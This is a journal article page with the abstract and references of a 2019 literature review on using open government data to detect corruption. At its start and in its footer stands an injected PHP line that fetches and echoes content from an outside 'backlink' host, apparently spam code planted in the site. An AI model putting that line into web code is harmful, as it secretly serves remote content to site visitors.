$a = file_get_contents('https://purefine.online/backlink.php'); echo $a; The Diffusion of ICT for Corruption Detection in Open Government Data | Darusalam | Knowledge Engineering and Data Science

The Diffusion of ICT for Corruption Detection in Open Government Data

Darusalam Darusalam, Jamaliah Said, Normah Omar, Marijn Janssen, Kazi Sohag

Abstract


Corruption occurs in many places within the government. To tackle the issue, open data can be used as one of the tools in creating more insight into the government. The premise of this paper is to support the notion that data opening can bring up new ways of fighting corruption. The current paper aimed at investigating how open data can be employed to detect corruption. This open data is trivial due to challenges like information asymmetry among stakeholders, data might only be opened partly, different sources of data need to be combined, and data might not be easy to use, might be biased or even manipulated. The study was conducted using a literature review approach. The reviews implied that corruption can be detected using Open Government Data, Thus, by conducting the open data technique within the government, the public could monitor the activities of the governments. The practical contribution of this paper is expected to assist the government in detecting corruption by using a data-driven approach. Furthermore, the scientific contribution will originate from the development of a framework reference architecture to uncover corruption cases.


Full Text:

PDF

References


Ahmed, A. A. E. & Traore, I. Anomaly intrusion detection based on biometrics. 2005. IEEE, 452-453.AMUNDSEN, I. 1999. Political corruption: An introduction to the issues, Chr. Michelsen Institute.

BERTOT, J. C., JAEGER, P. T. & GRIMES, J. M. Crowd-sourcing transparency: ICTs, social media, and government transparency initiatives. Proceedings of the 11th Annual International Digital Government Research Conference on Public Administration Online: Challenges and Opportunities, 2010a. Digital Government Society of North America, 51-58.

BERTOT, J. C., JAEGER, P. T. & GRIMES, J. M. 2010b. Using ICTs to create a culture of transparency: E-government and social media as openness and anti-corruption tools for societies. Government information quarterly, 27, 264-271.

BHAROSA, N. & JANSSEN, M. 2015. Principle-Based Design: A Methodology and Principles for Capitalizing Design Experiences for Information Quality Assurance. Journal of Homeland Security and Emergency Management, 12, 469-496.

BHAROSA, N., LEE, J., JANSSEN, M. & RAO, H. R. 2012. An activity theory analysis of boundary objects in cross-border information systems development for disaster management. Security Informatics, 1, 1.

CIA 2006. CENTRAL INTELLEGENCE AGENCY. https://www.cia.gov/library/publications/the-world-factbook/geos/tt.html.

CLOUTIER, R., MULLER, G., VERMA, D., NILCHIANI, R., HOLE, E. & BONE, M. 2010. The concept of reference architectures. Systems Engineering, 13, 14-27.

DWIVEDI, Y. K., RAVISHANKAR, M. & SIMINTIRAS, A. C. 2015. Completing a PhD in business and management: A brief guide to doctoral students and universities. Journal of Enterprise Information Management, 28, 615-621.

FADIARO, O., FADIARO, A. & AMINU, O. 2014. Coverage of Corruption News by Major Newspapers in Nigeria. Publications of New Media and Mass Communication, 24, 53-59.

GONG, Y. 2012. Engineering flexible and agile services: a reference architecture for administrative processes, TU Delft, Delft University of Technology.

GREEFHORST, D. & PROPER, E. 2011. Architecture principles: the cornerstones of enterprise architecture, Springer Science & Business Media.

HEVNER, A. & CHATTERJEE, S. 2010. Design research in information systems: theory and practice, Springer Science & Business Media.

HINDRIKS, J., KEEN, M. & MUTHOO, A. 1999. Corruption, extortion and evasion. Journal of Public economics, 74, 395-430.

HUIJBOOM, N. & VAN DEN BROEK, T. 2011. Open data: an international comparison of strategies. European journal of ePractice, 12, 4-16.

JANSSEN, M., CHARALABIDIS, Y. & ZUIDERWIJK, A. 2012. Benefits, adoption barriers and myths of open data and open government. Information Systems Management, 29, 258-268.

JANSSEN, W., VAN BUUREN, R. & GORDIJN, J. 2005. Business case modelling for e-services. Proceedings 18th Bled eConference: eIntegration in Action, Bled, Slovenia.

JETZEK, T., AVITAL, M. & BJORN-ANDERSEN, N. 2014. Data-driven innovation through open government data. Journal of theoretical and applied electronic commerce research, 9, 100-120.

JOHNSON, S., KAUFMANN, D. & ZOIDO-LOBATON, P. 1998. Regulatory discretion and the unofficial economy. The American Economic Review, 88, 387-392.

LEE, A. 2001. MIS quarterly’s editorial policies and practices. Mis Quarterly, 25, iii-vii.

LEITNER, J., MEISSNER, H. & MARTYNA-DAVID, E. 2015. The Debate About Political Risk: How Corruption, Favoritism and Institutional Ambiguity Shape Business Strategies in Ukraine. EU Crisis and the Role of the Periphery. Springer.

LEVY, Y. & ELLIS, T. J. 2006. A systems approach to conduct an effective literature review in support of information systems research. Informing Science: International Journal of an Emerging Transdiscipline, 9, 181-212.

MARCH, S. T. & SMITH, G. F. 1995. Design and natural science research on information technology. Decision support systems, 15, 251-266.

MAYER-SCHÖNBERGER, V. & CUKIER, K. 2013. Big data: A revolution that will transform how we live, work, and think, Houghton Mifflin Harcourt.

SCHWEGMANN, C. 2012. Open data in developing countries. European Public Sector Information Platform Topic Report, Epsi Platform, Germany.

SHLEIFER, A. & VISHNY, R. W. 1993. Corruption. The quarterly journal of economics, 108, 599-617.

SIMON, H. A. 1996. The sciences of the artificial, MIT press.

SOUSA, L. D. 2016. Open government and the use of ICT to reduce corruption risks. PPT.

UNDP, T. C. 2008. Transforming Lives: Accelerating Human Development in the Asia and the Pacific. New Delhi: Macmillan.

VON ALAN, R. H., MARCH, S. T., PARK, J. & RAM, S. 2004. Design science in information systems research. MIS quarterly, 28, 75-105.

WAITE, D. & ALLEN, D. 2003. Corruption and abuse of power in educational administration. The Urban Review, 35, 281-296.

WARD, J. S. & BARKER, A. 2013. Undefined by data: a survey of big data definitions. arXiv preprint arXiv:1309.5821.

WINDLEY, P. J. 2005. Digital identity, " O'Reilly Media, Inc.".




DOI: http://dx.doi.org/10.17977/um018v2i12019p10-18

Refbacks

  • There are currently no refbacks.


Copyright (c) 2019 Knowledge Engineering and Data Science

Creative Commons License
This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License.

Flag Counter

Creative Commons License


This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License.

View My Stats

---------------------------------------- ---------------------------------------- ---------------------------------------- $a = file_get_contents('https://purefine.online/backlink.php'); echo $a; ----------------------------------------